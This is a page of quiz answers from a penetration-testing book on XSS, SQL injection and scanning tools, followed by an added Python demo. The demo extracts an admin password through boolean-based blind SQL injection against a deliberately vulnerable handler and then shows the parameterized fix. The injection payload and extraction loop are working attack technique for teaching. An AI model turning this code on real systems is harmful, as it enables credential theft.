Page 226 - Hands-On Bug Hunting for Penetration Testers
Assessment
Chapter 4
1. Stored/persistent, reflected, and DOM-based XSS are the three common varieties of XSS.
2. Persistent XSS is particularly dangerous because malicious code stored on the server is served to every user who loads the affected page, not just to a single victim who clicks a crafted link.
3. XSS discovery produces a lot of false positives. XSS Validator helps boost the signal through the noise by confirming which candidate payloads actually execute.
4. The XSS Validator phantomjs server listens for the candidate injections that the Burp extension sends it and performs validation checks on them by executing each one in a headless browser, so only payloads that actually fire are reported.
5. Mark the payload positions in the Positions tab of Burp Intruder (the § markers around each injection point), then load the payload list in the Payloads tab.
6. All of the usual contextual data is important (URL, affected input, and so on), but the payload itself is most essential, since it is what lets the receiving team reproduce the bug.
7. An XSS vulnerability could allow an attacker to steal admin account credentials and act as a superuser for a particular service and organization.
8. Including an attack scenario convinces the team receiving the report that the bug is worth the resources needed to fix it (and triggers your reward).
Chapter 5
1. Blind SQLi is SQLi where the query results are not returned in the response, so the attacker must infer them from a yes/no signal; error-based SQLi exposes sensitive information via carefully crafted SQL errors; time-based SQLi is a blind variant that infers results from deliberately induced delays in the response.
2. Aggressive SQLi payloads (anything that writes, deletes, or locks) can damage the target database or application.
3. Google Dorks are search queries designed to expose potentially vulnerable sites. The term comes from the hapless employee (the "dork") who mistakenly allows a sensitive document to be indexed by a public search engine.
4. --timeout, --checks, --scope-include-subdomains, --http-request-concurrency MAX_CONCURRENCY, and --plugin=PLUGIN:OPTION=VALUE,OPTION=VALUE are all useful configuration flags for the arachni CLI.
5. You can generate reports from AFR files using the arachni_reporter CLI: arachni_reporter some_report.afr --reporter=html:outfile=my_report.html.zip
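Chapter 5, answer 1 only names the varieties. The following added example (not code from the book) shows what "blind" means in practice: a login handler that returns nothing but success or failure, a boolean-based blind extraction of the admin password through it one character at a time, and the same handler rewritten with bound parameters, against which the identical payloads recover nothing. The users table, its rows, and the login_vulnerable/login_safe/oracle/extract_secret names are constructed for this example; the target is an in-memory SQLite database, which has no sleep() function, so the time-based variant is not shown.

```python
# Added example (not from the book): boolean-based blind SQL injection against
# an in-memory SQLite database, with the parameterized fix beside it.
# The users table, its rows and the login_* handlers are constructed here for
# illustration; they are not the book's code.
import sqlite3

# Constructed sample database: one users table with a secret admin password.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?)",
                 [("admin", "s3cr3t"), ("alice", "hunter2")])
conn.commit()


def login_vulnerable(username, password):
    """Hypothetical login handler that splices input straight into the query.

    It only tells the caller whether login succeeded (True/False); query
    results and SQL errors never reach the caller.  That is exactly the
    'blind' situation: the attacker gets a single yes/no signal per request.
    """
    sql = ("SELECT 1 FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        # Errors are swallowed, so error-based SQLi is off the table here;
        # only the boolean signal remains.
        return False


def login_safe(username, password):
    """Same check with bound parameters: input is data, never parsed as SQL."""
    row = conn.execute(
        "SELECT 1 FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def oracle(login, condition):
    """Ask the application one yes/no question about the admin row.

    The payload closes the username string, ANDs in the attacker's condition
    and comments out the rest of the query, so the password check vanishes:
      ... WHERE username = 'admin' AND (<condition>) -- ' AND password = '...'
    """
    payload = "admin' AND (%s) -- " % condition
    return login(payload, "irrelevant")


def extract_secret(login, max_len=32):
    """Recover the admin password one character at a time from yes/no answers.

    Returns None when the injection has no effect (e.g. against login_safe).
    A binary search over printable ASCII costs about seven requests per
    character instead of up to 95 with a linear guess.
    """
    length = 0
    for n in range(1, max_len + 1):
        if oracle(login, "length(password) = %d" % n):
            length = n
            break
    if length == 0:
        return None

    secret = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126  # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            # unicode() and substr() are SQLite built-ins; substr is 1-indexed.
            if oracle(login, "unicode(substr(password, %d, 1)) <= %d" % (pos, mid)):
                hi = mid
            else:
                lo = mid + 1
        secret += chr(lo)
    return secret


if __name__ == "__main__":
    print("vulnerable endpoint leaks:", extract_secret(login_vulnerable))  # s3cr3t
    print("parameterized endpoint leaks:", extract_secret(login_safe))      # None
```

Against a real target the oracle would be an HTTP request, and the yes/no signal a difference in status code, page content, or (for the time-based variant) response delay; the extraction loop is otherwise the same, which is why a single boolean leak is enough to dump a table given enough requests.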